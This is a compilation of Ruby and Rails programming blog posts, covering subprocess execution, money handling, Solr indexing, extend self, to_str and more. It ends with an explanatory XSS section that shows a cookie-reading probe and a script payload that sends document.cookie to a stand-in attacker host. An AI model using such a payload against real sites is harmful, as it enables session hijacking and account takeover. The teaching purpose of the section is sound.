To get a visual feel, I added a puts inside each of the save methods. Here is the result.

1.9.1 :001 > User.new.save
entering save in transactions
   (0.1ms)  begin transaction
entering save in attribute_methods
entering save in validations
entering save in persistence
  SQL (47.3ms)  INSERT INTO "users" ("created_at", "updated_at") VALUES (?, ?)  [["created_at", Mon, 21 Jan 2013 14:56:52 UTC +00:00], ["updated_at", Mon, 21 Jan 2013 14:56:52 UTC +00:00]]
leaving save in persistence
leaving save in validations
leaving save in attribute_methods
   (17.6ms)  rollback transaction
leaving save in transactions
 => nil

As you can see the order of operations is

entering save in transactions
entering save in attribute_methods
entering save in validations
entering save in persistence

leaving save in persistence
leaving save in validations
leaving save in attribute_methods
leaving save in transactions

Handling money in ruby

In Ruby, do not use Float for money calculations, since floating point numbers cannot represent most decimal fractions exactly.

irb(main):001:0> 200 * (7.0/100)
=> 14.000000000000002

7 % of 200 should be 14. But float is returning 14.000000000000002 .

To ensure that the calculation is right, make sure that all the values participating in the calculation are of class BigDecimal. Here is how the same operation can be performed using BigDecimal.

irb(main):003:0> result = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
=> #<BigDecimal:7fa5eefa1720,'0.14E2',9(36)>
irb(main):004:0> result.to_s
=> "14.0"

As we can see, BigDecimal gives the exact result.
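
On recent ruby versions BigDecimal.new is no longer available, and the Kernel method BigDecimal() is used instead. Here is a small sketch of the same comparison under that assumption. The variable names are made up for illustration.

```ruby
require 'bigdecimal'

# Float arithmetic picks up a tiny binary rounding error.
float_result = 200 * (7.0 / 100)

# BigDecimal() builds decimals from strings, so 0.07 is stored exactly.
decimal_result = BigDecimal('200') * (BigDecimal('7') / BigDecimal('100'))

puts float_result == 14        # => false
puts decimal_result == 14      # => true
puts decimal_result.to_s('F')  # => 14.0
```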

Converting money to cents

In order to charge the credit card using Stripe we needed to have the amount to be charged in cents. One way to convert the value to cents would be

amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
puts (amount * 100).to_i #=> 1400

The above method works, but I like to delegate the job of making money out of a complex BigDecimal value to a gem like money. In this project we are using activemerchant, which depends on the money gem, so we get the money gem for free. You might have to add the money gem to your Gemfile if you want to use the following technique.

money gem lets you get a money instance out of BigDecimal.

amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
amount_in_money = amount.to_money
puts amount_in_money.cents #=> 1400

Stay in BigDecimal or money mode for calculation

If you are doing any sort of calculation then all participating elements must be either BigDecimal or Money instances. It is best if all the elements are of the same type.
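
One detail worth keeping in mind when converting a BigDecimal to cents by hand is that to_i truncates rather than rounds. Here is a small sketch with a made-up amount that has a fractional cent. Which behavior is right depends on the business rule, so treat this as an illustration and not a recommendation.

```ruby
require 'bigdecimal'

# Made-up amount with a fraction of a cent.
amount = BigDecimal('10.999')

truncated_cents = (amount * 100).to_i   # drops the fractional cent
rounded_cents   = (amount * 100).round  # rounds to the nearest cent

puts truncated_cents # => 1099
puts rounded_cents   # => 1100
```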

Executing commands in ruby

Ruby allows many different ways to execute a command or a sub-process. In this article we are going to see some of them.

backtick

1. Returns standard output

backtick returns the standard output of the operation.

output = `ls`
puts "output is #{output}"

Result of above code is

$ ruby main.rb
output is lab.rb
main.rb

2. Exception is passed on to the master program

The backtick operation forks the master process and the operation is executed in a new process. If the command cannot be launched, as in the example below, an exception is raised in the main process and the main process terminates if the exception is not handled.

In the following case I am executing xxxxxxx which is not a valid executable name.

output = `xxxxxxx`
puts "output is #{output}"

Result of above code is given below. Notice that puts was never executed because the backtick operation raised exception.

$ ruby main.rb
main.rb:1:in ``': No such file or directory - xxxxxxx (Errno::ENOENT)
	from main.rb:1:in `<main>'

3. Blocking operation

Backtick is a blocking operation. The main application waits until the backtick operation completes.

4. Checking the status of the operation

To check the status of the backtick operation you can execute $?.success?

output = `ls`
puts "output is #{output}"
puts $?.success?

Notice that the last line of the result contains true because the backtick operation was a success.

$ ruby main.rb
output is lab.rb
main.rb
true

backtick returns STDOUT. backtick does not capture STDERR. If you want to learn about STDERR then check out this excellent article.

You can redirect STDERR to STDOUT if you want to capture STDERR using backtick.

output = `grep hosts /private/etc/* 2>&1`
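
The difference can be checked with a command that writes only to STDERR. Here is a minimal sketch, assuming a POSIX shell is available as sh. The variable names are made up for illustration.

```ruby
# Without redirection the message goes to the terminal, not to the
# return value of the backtick.
without_redirect = `sh -c 'echo oops >&2'`

# With 2>&1 the STDERR of the command is merged into STDOUT and captured.
with_redirect = `sh -c 'echo oops >&2' 2>&1`

puts without_redirect.inspect # => ""
puts with_redirect.inspect    # => "oops\n"
puts $?.success?              # => true
```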

5. String interpolation is allowed within the ticks

cmd = 'ls'
`#{cmd}`

6. Different delimiter and string interpolation

%x does the same thing as backtick. It allows you to use a different delimiter.

output = %x[ ls ]
output = %x{ ls }

backtick runs the command via the shell. So shell features like wildcards can be used, and ruby string interpolation works as well. Here is an example.

$ irb
> dir = '/etc'
> %x<ls -al #{dir}>
=> "lrwxr-xr-x@ 1 root  wheel  11 Jan  5 21:10 /etc -> private/etc"

system

system behaves a bit like backtick operation. However there are some differences.

Let’s look at the similarities and the differences.

1. Blocking operation

Just like backtick, system is a blocking operation.

2. Eats up all exceptions

system eats up all the exceptions. So the main operation never needs to worry about capturing an exception raised from the child process.

output = system('xxxxxxx')
puts "output is #{output}"

Result of the above operation is given below. Notice that even though the command failed the main program completes and the output is printed. The value of output is nil because the command could not be executed.

$ ruby main.rb
output is

3. Checking the status of the operation

system returns true if the command was successfully performed ( exit status zero ) . It returns false for non zero exit status. It returns nil if command execution fails.

system("command that does not exist")  #=> nil
system("ls")                           #=> true
system("ls | grep foo")                #=> false
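
The three return values can be told apart in code. Here is a minimal sketch, assuming a Unix-like system where the standard true and false commands exist. The third command name is made up and is assumed not to be installed.

```ruby
ok      = system('true')   # exits with status zero
failed  = system('false')  # exits with a non-zero status
# Hypothetical command name, assumed not to exist on this machine.
missing = system('command-that-does-not-exist-xyz')

puts ok.inspect      # => true
puts failed.inspect  # => false
puts missing.inspect # => nil
```

Because nil and false are both falsy, code that needs to tell "could not run" apart from "ran and failed" has to compare against nil explicitly.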

exec

exec replaces the current process by running the external command. Let’s see an example.

Here I am in irb and I am going to execute exec('ls').

$ irb
1.9.3-p194 :001 > exec('ls')
lab.rb  main.rb

nsingh ~/dev/lab 1.9.3
$

I see the result but since the irb process was replaced by the exec process I am no longer in irb .

Behind the scenes both system and backtick operations use fork to fork the current process and then they execute the given operation using exec.

Since exec replaces the current process it does not return anything if the operation is a success. If the operation fails then SystemCallError is raised.

sh

sh actually calls system under the hood. However it is worth a mention here. This method is added by FileUtils in rake. It allows an easy way to check the exit status of the command.

require 'rake'
sh %w(xxxxx) do |ok, res|
   if !ok
     abort 'the operation failed'
   end
end

popen3

If you are going to capture stdout and stderr then you should use popen3 since this method allows you to interact with stdin, stdout and stderr .

I want to execute git push heroku master programmatically and I want to capture the output. Here is my code.

require 'open3'
cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  puts "stdout is:" + stdout.read
  puts "stderr is:" + stderr.read
end

And here is the output. It has been truncated since rest of output is not relevant to this discussion.

stdout is:
stderr is:
-----> Heroku receiving push
-----> Ruby/Rails app detected
-----> Installing dependencies using Bundler version 1.2.1

The important thing to note here is that when I execute the program with ruby lab.rb I do not see any output on my terminal for the first 10 seconds. Then I see the whole output as one single dump.

The other thing to note is that heroku is writing all this output to stderr and not to stdout .

The above solution works but it has one major drawback. The push to heroku might take 10 to 20 seconds and for this period we do not get any feedback on the terminal. In reality when we execute git push heroku master we start seeing results on our terminal line by line as heroku is processing things.

So we should capture the output from heroku as it is being streamed rather than dumping the whole output as one single chunk of string at the end of processing.

Here is the modified code.

require 'open3'
cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stderr.gets
    puts line
  end
end

Now when I execute above command using ruby lab.rb I get the output on my terminal incrementally as if I had typed git push heroku master .

Here is another example of capturing streaming output.

require 'open3'
cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stdout.gets
    puts line
  end
end

In the above case you will get the output of ping on your terminal as if you had typed ping www.google.com on your terminal .

Now let’s see how to check if command succeeded or not.

require 'open3'
cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  exit_status = wait_thr.value
  unless exit_status.success?
    abort "FAILED !!! #{cmd}"
  end
end
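
To try the pieces together without pushing to heroku, here is a minimal sketch that runs a made-up shell command writing to both streams and exiting with status 3. It assumes a POSIX shell. Reading stdout fully and then stderr is fine for small outputs like this one, but a command that produces a lot of output may need the streaming approach shown earlier.

```ruby
require 'open3'

# Made-up command: one line on stdout, one on stderr, exit status 3.
cmd = 'echo out; echo err >&2; exit 3'
out = err = status = nil

Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  stdin.close              # the command does not read any input
  out = stdout.read
  err = stderr.read
  status = wait_thr.value  # waits for the process and returns Process::Status
end

puts "stdout is: #{out}"
puts "stderr is: #{err}"
puts "exit status is: #{status.exitstatus}"
```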

popen2e

popen2e is similar to popen3 but merges the standard output and standard error .

require 'open3'
cmd = 'ping www.google.com'
Open3.popen2e(cmd) do |stdin, stdout_err, wait_thr|
  while line = stdout_err.gets
    puts line
  end

  exit_status = wait_thr.value
  unless exit_status.success?
    abort "FAILED !!! #{cmd}"
  end
end

In all other areas this method works similarly to popen3.

Process.spawn

Process.spawn (also available as Kernel#spawn) starts the given command in a child process and does not wait for it to finish. It returns immediately with the process id.

irb(main)> pid = Process.spawn("ls -al")
=> 81001
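
Since spawn does not wait, the exit status has to be collected separately. Here is a minimal sketch, assuming a Unix-like system with a sleep command. Process.wait2 is used to wait for the child and get its status.

```ruby
# spawn returns right away while the child keeps running.
pid = Process.spawn('sleep 1')
puts "spawned child with pid #{pid}"

# wait2 blocks until the child exits and returns [pid, Process::Status].
_, status = Process.wait2(pid)
puts status.success?
```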

Redirect to www for heroku with SSL

If you are using heroku and you have enabled https then the site must be redirected to use www. It means all Rails applications should ensure that “no-www” urls are redirected to “www”.

In Rails3 it is pretty easy to do. Here is how it can be done.

Bigbinary::Application.routes.draw do

  constraints(:host => /^bigbinary.com/) do
    root :to => redirect("http://www.bigbinary.com")
    match '/*path', :to => redirect {|params| "http://www.bigbinary.com/#{params[:path]}"}
  end

end

Solr, Sunspot, Websolr and Delayed job

Solr is an open source search platform from Apache. It has a very powerful full-text search capability among other things.

Solr is written in Java, and it runs as a standalone search server within a servlet container like Tomcat. When you are working on a Ruby on Rails application you do not want to maintain a Tomcat server. This is where websolr comes into the picture. Websolr manages the index and the Rails application interacts with the index using a gem called sunspot_rails.

Getting started

# Gemfile
gem 'sunspot_rails', '= 1.3.3' # search feature

Here I am interested in searching products.

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
end

Using sunspot gem

rails g sunspot_rails:install

Above command creates config/sunspot.yml file. By default this file looks like following.

production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING

development:
  solr:
    hostname: localhost
    port: 8982
    log_level: INFO

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: WARNING

The way sunspot works is that after every single web request it updates solr about the changes that took place in the request. This is not desirable. To turn that off set the auto_commit_after_request option to false in the config/sunspot.yml file.

I would also change the log_level for development to DEBUG . The revised config/sunspot.yml file would look like

production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING
    auto_commit_after_request: false

development:
  solr:
    hostname: localhost
    port: 8980
    log_level: DEBUG
    auto_commit_after_request: false

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: DEBUG
    auto_commit_after_request: false

Taking care of callbacks

In the above case anytime I create, update or destroy a product, solr commit commands are issued as part of the after_save callback. Since after_save callbacks are part of the ActiveRecord transaction, this slows down the create, update and destroy operations. I would like all these operations to happen in the background.

Here is how I handled it

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50
  handle_asynchronously :remove_from_index, queue: 'indexing', priority: 50
end

In the above case I used Delayed Job but you can use any background job processing tool.

In case of Delayed Job the higher the priority value the less is the priority. By bumping the priority value to 50, I’m making sure that emails and other background jobs are processed before solr work is taken up.

Problem with remove_from_index

In the above case the call to remove_from_index has been deferred to Delayed Job. However the record has already been destroyed. So when Delayed Job takes up the work it first tries to retrieve the record. However the record is missing and the background job fails.

Here is how we solved this problem.

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50

  def remove_from_index_with_delayed
    Delayed::Job.enqueue RemoveIndexJob.new(record_class: self.class.to_s, attributes: self.attributes), queue: 'indexing', priority: 50
  end
  alias_method_chain :remove_from_index, :delayed
end

Add another worker in a file named remove_index.rb.

class RemoveIndexJob < Struct.new(:options)
  def perform
    return if options.nil?
    options.symbolize_keys!
    record = options[:record_class].constantize.new options[:attributes].except("id")
    record.id = options[:attributes]["id"]
    record.remove_from_index_without_delayed
  end
end

Connecting to websolr

From the websolr documentation it was not clear that the sunspot gem first looks for an environment variable called WEBSOLR_URL and if that environment variable has a value then sunspot assumes that the solr index is at that url. If no value is found then it assumes that it is dealing with a local solr instance.

So if you are using websolr then make sure that your application has environment variable WEBSOLR_URL properly configured in staging and in production environment.

Test factories first

In a blog post the thoughtbot team outlined how they test their factories first. I like this approach. Since we prefer using minitest, here is how we implemented it. It is similar to what the thoughtbot blog has described. However I still want to blog about it so that we can use a similar approach in our other projects.

First under spec directory create a file called factories_spec.rb . Here is how our file looks.

require File.expand_path(File.dirname(__FILE__) + '/spec_helper')

describe FactoryGirl do
  EXCEPTIONS = %w(base_address base_batch bad_shipping_address shipping_method_rate bad_billing_address)
  FactoryGirl.factories.each do |factory|
    next if EXCEPTIONS.include?(factory.name.to_s)
    describe "The #{factory.name} factory" do

      it 'is valid' do
        instance = build(factory.name)
        instance.must_be :valid?
      end
    end
  end
end

Next I need to tell rake to always run this test file first.

When the rake command is executed it goes through all the .rake files and loads them. So all we need to do is create a rake file called factory.rake and put this file under lib/tasks.

desc 'Run factory specs.'
Rake::TestTask.new(:factory_specs) do |t|
  t.pattern = './spec/factories_spec.rb'
end

task test: :factory_specs

Here a dependency is being added to test . And if factory test fails then dependency is not met and the main test suite will not run.

That’s it. Now each unit test does not need to test factory first. All factories are getting tested here.

Classes are for designers. data-behavior is for JavaScript developers.

I have written a lot of JavaScript code like this

$(".product_pictures .actions .delete").on "click", ->
  do_something_useful

The problem with the above code is that class names in the html markup were meant for web design. By using css classes for functional work, I have made both the design team and the front end development team perpetually terrified of making any change.

Class is meant for CSS

If designer wants to change markup from

<div class='first actions'>xxx</div>

to

<div class='first actions-items'>xxx</div>

they are not too sure what JavaScript code might break. So they work around it.

Same goes for JavaScript developers. They do not want to unintentionally remove a class element otherwise the web design might get messed up.

There has to be a better way which clearly separates the design elements from the functional elements.

data-behavior to the rescue

Nick Quaranto of 37Signals presented “Code spelunking in the All New Basecamp” in a video.

In his presentation he mentioned data-behavior .

data-behavior usage can be best understood by an example.

// no data-behavior
$(".product_pictures .actions .delete").on("click", function(){});
// code with data-behavior
$('[data-behavior~=delete-product-picture]').on('click', function(){});

// Another style with the same effect
$(document).on('click',"[data-behavior~=delete-product-picture]",  function(){ });

The html markup will change from

 <%= link_to '#', class: 'delete', "data-action-id" => picture.id do %>

to

<%= link_to '#', class: 'delete', "data-action-id" => picture.id, 'data-behavior' => 'delete-product-picture' do %>

Above code would produce html looking something like this

<a class="delete" data-action-id="" data-behavior="delete-product-picture" href="#">
  <button>Delete</button>
</a>

Now in the above case the designer can change the css class as desired and it will have no impact on JavaScript functionality.

More usage of data-behavior

Based on this data-behavior approach I changed some part of nimbleShop to use data-behavior. Here is the commit.

data-behavior is a very simple and effective tool for keeping a clear separation between design elements and JavaScript functional work.

Code snippet for reference

Over time we have used this technique successfully in many projects. However sometimes I need to spend a while finding the right way to add data-behavior. I’m adding some code snippets here so that I can find them when I need them.

%div{ class: "", "data-behavior" => "search-container" }

.div{ data: { behavior: 'search-container' }, style: "" }

= button_tag '×', :class => "", "data-behavior" => "search-container"

= link_to 'Edit', "#",
                  data:{ behavior: 'display-in-modal', url: '' },
                  class: ""

= f.check_box :include_annual_workplan,
              'data-behavior' => 'input-include-workplan'

= f.text_area :content, placeholder: "",
                        class: '',
                        data: { behavior: "comment-content" }

= f.text_field :name, class: '',
                      'data-behavior' => 'input-client-name'

= form_for '', data: { remote: true, behavior: 'add-comment-form' } do |f|

emberjs mixin

emberjs has a mixin feature which allows code reuse and keeps code modular. It also supports the _super() method.

mixin using apply

m = Ember.Mixin.create({
  skill: function() {
    return 'JavaScript & ' + this._super()
  }
});
main = { skill: function(){ return 'Ruby' }}
o  = m.apply(main);
console.log(o.skill());

result: JavaScript & Ruby

mixin in create and extend

Now let’s see usage of mixin in create and extend. Since create and extend work similarly I am only going to discuss the create scenario.

skillJavascript = Ember.Mixin.create({
  skill: function() { return 'JavaScript '}
});
main = { skill: function() { return 'Ruby & ' + this._super(); } }
p = Ember.Object.create(skillJavascript, main )
console.log(p.skill())

result: Ruby & JavaScript

Notice that in the first case the mixin code was executed first. In the second case the mixin code was executed later.

Here is how it works

Here is mergeMixins code which accepts the mixins and the base class. In the first case the mixins list is just the mixin and the base class is the main class.

At run time all the mixin properties are looped through. In the first case the mixin m has a property called skill .

m.mixins[0].properties.skill

function () {
    return 'JavaScript & ' + this._super()
  }

Runtime detects that both the mixin and the base class have a property called skill. Since the base class has the first claim to the property a call is made to link the _super of the second function to the first function.

That work is done by the wrap function.

So at the end of the execution the mixin code points to base code as _super.

It reverses itself in case of create

In the second case the mixin skillJavascript and the main are the mixins to the base class of Class. The mixin is the first in the looping order. So the mixin has the first claim to the key skill since it was unclaimed by the base class to begin with.

Next comes the main function and since the key is already taken the wrap function is used to map _super of main to point to the mixin .

Remember in Create and Extend it is the last one that executes first

Here is an example with two mixins.

skillHaskell = Ember.Mixin.create({
  skill: function() { return 'Haskell' }
});
skillJavascript = Ember.Mixin.create({
  skill: function() { return 'JavaScript & ' + this._super() }
});
p = Ember.Object.create(skillHaskell, skillJavascript, { skill: function(){ return 'Ruby & ' + this._super(); } } )
console.log(p.skill())

result: Ruby & JavaScript & Haskell

In this case the haskell mixin first claimed the key. So the javascript mixin’s _super points to haskell and the main code’s _super points to Javascript.

Emberjs makes good use of mixin

emberjs has features like comparable, freezable, enumerable, sortable, observable. Take a look at this to checkout their code.

extend self in ruby

Following code was tested with ruby 1.9.3 .

Class is meant for both data and behavior

Let’s look at this ruby code.

class Util
  def self.double(i)
   i*2
  end
end

Util.double(4) #=> 8

Here we have a Util class. But notice that all the methods on this class are class methods. This class does not have any instance variables. Usually a class is used to carry both data and behavior and, in this case, the Util class has only behavior and no data.

Similar utility tools in ruby

Now to get some perspective on this discussion let’s look at some ruby methods that do a similar thing. Here are a few.

require 'base64'
Base64.encode64('hello world') #=> "aGVsbG8gd29ybGQ=\n"

require 'benchmark'
Benchmark.measure { 10*2000 }

require 'fileutils'
FileUtils.chmod 0644, 'test.rb'

Math.sqrt(4) #=> 2.0

In all the above cases the class method is invoked without creating an instance first. So this is similar to the way I used Util.double .

However let’s see what the class of all these objects is.

Base64.class #=> Module
Benchmark.class #=> Module
FileUtils.class #=> Module
Math.class #=> Module

So these are not classes but modules. That begs the question why the smart guys at ruby-core implemented them as modules instead of creating a class the way I did for Util.

The reason is that a class is too heavy for holding only methods like double. As we discussed earlier, a class is supposed to have both data and behavior. If the only thing you care about is behavior then ruby suggests implementing it as a module.

extend self is the answer

Before I go on to discuss extend self here is how my Util class will look after moving from Class to Module.

module Util
  extend self

  def double(i)
    i * 2
  end
end

puts Util.double(4) #=> 8

So how does extend self work

First let’s see what extend does.

module M
 def double(i)
  i * 2
 end
end

class Calculator
  extend M
end
puts Calculator.double(4)

In the above case Calculator is extending module M and hence all the instance methods of module M are directly available to Calculator.

In this case Calculator is a class that extended the module M. However Calculator does not have to be a class to extend a module.

Now let’s try a variation where Calculator is a module.

module M
 def double(i)
  i * 2
 end
end

module Calculator
  extend M
end
puts Calculator.double(4) #=> 8

Here Calculator is a module that is extending another module.

Now that we understand that a module can extend another module look at the above code and question why module M is even needed. Why can’t we move the method double to module Calculator directly. Let’s try that.

module Calculator
  extend Calculator

   def double(i)
    i * 2
   end
end
puts Calculator.double(4) #=> 8

I got rid of module M and moved the method double inside module Calculator. Since module M is gone I changed from extend M to extend Calculator.

One last fix.

Inside the module Calculator what is self. self is the module Calculator itself. So there is no need to repeat Calculator twice. Here is the final version

module Calculator
  extend self

   def double(i)
    i * 2
   end
end
puts Calculator.double(4) #=> 8
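
One way to see what extend self does is to inspect the singleton class of the module. Here is a minimal sketch using a made-up module named Converter and a made-up class named Invoice. It also shows that the methods remain ordinary instance methods, so the module can still be included elsewhere.

```ruby
# Hypothetical module, used only for illustration.
module Converter
  extend self

  def double(i)
    i * 2
  end
end

# Callable directly on the module ...
puts Converter.double(4) # => 8

# ... because the module now appears among its own singleton ancestors.
puts Converter.singleton_class.include?(Converter) # => true

# The same method is still available to classes that include the module.
class Invoice
  include Converter
end

puts Invoice.new.double(4) # => 8
```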

Converting A Class into a Module

Every time I encountered code like extend self my brain would pause for a moment. Then I would google for it and read about it. Three months later I would repeat the whole process.

The best way to learn it is to use it. So I started looking for a case to use extend self. It is not a good practice to go hunting for code to apply an idea you have in your mind but here I was trying to learn.

Here is a before snapshot of methods from Util class I used in a project.

class Util
  def self.config2hash(file); end
  def self.in_cents(amount); end
  def self.localhost2public_url(url, protocol); end
end

After using extend self code became

module Util
  extend self

  def config2hash(file); end
  def in_cents(amount); end
  def localhost2public_url(url, protocol); end
end

Much better. It makes the intent clear and, I believe, it is in line with the way ruby expects us to use modules.

Another usage in line with how Rails uses extend self

Here I am building an ecommerce application and each new order needs to get a new order number from a third party sales application. The code might look like this. I have omitted the implementation of the methods because they are not relevant to this discussion.

class Order
  def amount; end
  def buyer; end
  def shipped_at; end
  def number
    @number || self.class.next_order_number
  end

  def self.next_order_number; 'A100'; end
end

puts Order.new.number #=> A100

Here the method next_order_number might be making a complicated call to another sales system. Ideally the class Order should not expose method next_order_number . So we can make this method private but that does not solve the root problem. The problem is that model Order should not know how the new order number is generated. Well we can move the method next_order_number to another Util class but that would create too much distance.

Here is a solution using extend self.

module Checkout
  extend self

  def next_order_number; 'A100'; end

  class Order
    def amount; end
    def buyer; end
    def shipped_at; end
    def number
      @number || Checkout.next_order_number
    end
  end
end

puts Checkout::Order.new.number #=> A100

Much better. The class Order is not exposing method next_order_number and this method is right there in the same file. No need to open the Util class.

To see practical examples of extend self please look at Rails source code and search for extend self. You will find some interesting usage.

This is my first serious attempt to learn usage of extend self so that next time when I come across such code my brain does not freeze. If you think I have missed out something then do let me know.

to_str in ruby

Following code was tested with ruby 1.9.3 .

All objects have to_s method

The to_s method is defined in the Object class and hence all ruby objects have a to_s method.

Certain methods always call to_s method. For example when we do string interpolation then to_s method is called. puts invokes to_s method too.

class Lab
 def to_s
  'to_s'
 end
 def to_str
  'to_str'
 end
end

l = Lab.new
puts "#{l}" #=> to_s
puts l #=> to_s

to_s is simply the string representation of the object.

Before we look at to_str let’s see a case where ruby raises error.

e = Exception.new('not sufficient fund')

# case 1
puts e

# case 2
puts "Notice: #{e}"

# case 3
puts "Notice: " + e

Here is the result

not sufficient fund
Notice: not sufficient fund
`+': can't convert Exception into String (TypeError)

In the first two cases the to_s method of object e was printed.

However in case ‘3’ ruby raised an error.

Let’s read the error message again.

`+': can't convert Exception into String (TypeError)

In this case on the left hand side we have a string object. To this string object we are trying to add object e. Ruby could have called to_s method on e and could have produced the result. But ruby refused to do so.

Ruby refused to do so because it found that the object we are trying to add to the string is not of type String. When we call to_s we get the string representation of the object. But the object might or might not behave like a string.

Here we are not looking for the string representation of e. What we want is for e to behave like a string. And that is where to_str comes into the picture. I have a few more examples to clear this up so hang in there.

What is to_str

If an object implements to_str method then it is telling the world that my class might not be String but for all practical purposes treat me like a string.

So if we want to make exception object behave like a string then we can add to_str method to it like this.

e = Exception.new('not sufficient fund')

def e.to_str
  to_s
end

puts "Notice: " + e #=> Notice: not sufficient fund

Now when we run the code we do not get any exception.

What would happen if Fixnum has to_str method

Here is an example where ruby raises exception.

i = 10
puts '7' + i #=> can't convert Fixnum into String (TypeError)

Here Ruby is saying that Fixnum is not like a string and it should not be added to String.

We can make Fixnum to behave like a string by adding a to_str method.

class Fixnum
  def to_str
    to_s
  end
end
i = 10
puts '7' + i #=> 710

The practical usage of this example can be seen here.

irb(main):002:0> ["hello", "world"].join(1)
TypeError: no implicit conversion of Fixnum into String

In the above case ruby is refusing to invoke to_s on “1” because it knows that adding “1” to a string does not feel right.

However we can add method to_str to Fixnum as shown in the last section and then we will not get any error. In this case the result will be as shown below.

irb(main):008:0> ["hello", "world"].join(1)
=> "hello1world"

A real practical example of defining to_str

I tweeted about a quick lesson in to_s vs to_str and a few people asked me to expand on that. Let’s see what is happening here.

Before the refactoring was done Path was a subclass of String. So it was a String and it had all the methods of a string.

As part of refactoring Path is no longer extending from String. However for all practical purposes it acts like a string. This line is important and I am going to repeat it. For all practical purposes Path here is like a String.

Here we are not talking about the string representation of Path. Here Path is so close to String that practically it can be replaced for a string.

So in order to be like a String class Path should have to_str method and that’s exactly what was done as part of refactoring.

During discussion with my friends someone suggested instead of defining to_str tenderlove could have just defined to_s and the result would have been same.

Yes the result would be the same whether you have defined to_s or to_str if you are doing puts.

puts Path.new('world')

However in the following case just defining to_s will cause error. Only by having to_str following case will work.

puts 'hello ' + Path.new('world')

So the difference between defining to_s and to_str is not just what you see in the output.
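
Here is a minimal sketch of that difference. Path below is a made-up stand-in and not the actual class from the refactoring, and Label is a hypothetical class that defines only to_s.

```ruby
# Stand-in class that behaves like a string: defines both to_s and to_str.
class Path
  def initialize(value)
    @value = value
  end

  def to_s
    @value
  end

  def to_str
    @value
  end
end

# Hypothetical class with only a string representation.
class Label
  def initialize(value)
    @value = value
  end

  def to_s
    @value
  end
end

puts 'hello ' + Path.new('world') # => hello world

begin
  'hello ' + Label.new('world')
rescue TypeError => e
  # String#+ asks for to_str, which Label does not have.
  puts "TypeError: #{e.message}"
end
```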

Conclusion

If a class defines to_str then that class is telling the world that although my class is not String you can treat me like a String.

jquery-ujs and jquery trigger

Let’s see how to make AJAX call using jquery.

jQuery’s ajax method’s success callback function takes three parameters. Here is the api .

success(data, textStatus, jqXHR)

So if you are making ajax call using jQuery the code might look like

$.ajax({
  url: 'ajax/test.html',
  success: function(data, textStatus, jqXHR) {
    console.log(data);
  }
});

ajax using jquery-ujs

If you are using Rails and jquery-ujs then you might have code like this

<a href="/users/1" data-remote="true" data-type="json">Show</a>
$('a').bind('ajax:success', function(data, status, xhr) {
  alert(data.name);
});

The above code will not work. In order to make it work the very first parameter of the callback must be the event object. Here is the code that will work.

$('a').bind('ajax:success', function(event, data, status, xhr) {
  alert(data.name);
});

Remember that the jQuery API says that the first parameter should be “data”. So why do we need to accept an event object first to make it work?

Why event object is needed

Here is a snippet from the jquery-ujs code

success: function(data, status, xhr) {
  element.trigger('ajax:success', [data, status, xhr]);
}

The thing about the trigger method is that the event object is always passed as the first parameter to the event handler, and the extra values ([data, status, xhr] here) follow it. This is why, when you are using jquery-ujs, the first parameter of the callback function has to be the event object.

XSS and Rails

XSS is consistently a top web application security risk as per The Open Web Application Security Project (OWASP).

An XSS vulnerability allows a hacker to execute JavaScript code that the hacker has put in.

Most web applications have a form. A user enters <script>alert(document.cookie)</script> in the address field and hits submit. If the user sees a JavaScript alert then it means the user can execute the JavaScript code that the user has put in. It means the site has an XSS vulnerability.

Almost all modern web applications have some JavaScript code, and the application executes that JavaScript code. So running JavaScript code is not an issue. The issue is that in this case the hacker is able to put in JavaScript code and then the hacker is able to run that code. No one should be allowed to put their JavaScript code into the application.

If a hacker can execute JavaScript code then the hacker can see some other person’s cookie. Later we will see how the hacker can do that.

If you are logged into an application then that application sets a cookie. That is how the application knows that you are logged in.

If a hacker can see someone else’s cookie then the hacker can log in as that person by stealing the cookie.

Having SSL does not protect a site from an XSS vulnerability.

XSS stands for Cross-site scripting. It is a very misleading name because XSS has absolutely nothing to do with cross-site. It has everything to do with a site, any site.

A practical example

It is very common to display an address in a formatted way. Usually the code is something like this.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />')

When the developer looks at the html page the developer will see something like this.

[Image: the page showing literal <br /> tags in the address]

The <br /> tag is literally shown on the screen. The developer looks at the html markup rendered by Rails and it looks like this

[Image: the html markup rendered by Rails]

So the developer comes back to the code and marks the string html_safe as shown below.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />').html_safe

Now the browser renders the address with proper <br /> tags and the address looks nicely formatted as shown below.

[Image: the nicely formatted address]

The developer is happy and the developer moves on.

However notice that the developer has marked user input data like address1 as html_safe and that’s dangerous.

Hacker in action

The application has a number of users and everything is running smoothly. All the users are seeing properly formatted addresses. And then one day a hacker tries to hack the site. The hacker puts in address1 as <script>alert(document.cookie)</script>.

Now the hacker will see a JavaScript alert which might look like this.

[Image: JavaScript alert showing the cookie]

If we look at the html markup then the html might look like this.

John Smith<br /><script>alert(document.cookie)</script><br />Suite #110
<br />Miami<br />FL<br />33027<br />USA

The hacker had put in <script> and the application sent that code to the browser. The browser did its job. It executed the JavaScript code and in the process the hacker is able to see the cookie.

How would a hacker steal someone else’s information?

Let’s say that an application has a comment form. In the comment form the hacker puts in the following comment.

<script> window.location='http://hacker-site.com?cookie='+document.cookie </script>

